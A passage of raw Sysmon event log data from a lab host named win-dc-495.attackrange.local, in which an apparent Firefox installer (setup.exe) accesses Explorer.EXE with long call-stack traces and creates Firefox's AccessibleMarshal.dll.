ll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\AccessibleMarshal.dll2021-01-18 13:59:52.099 10341000x800000000000000014121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 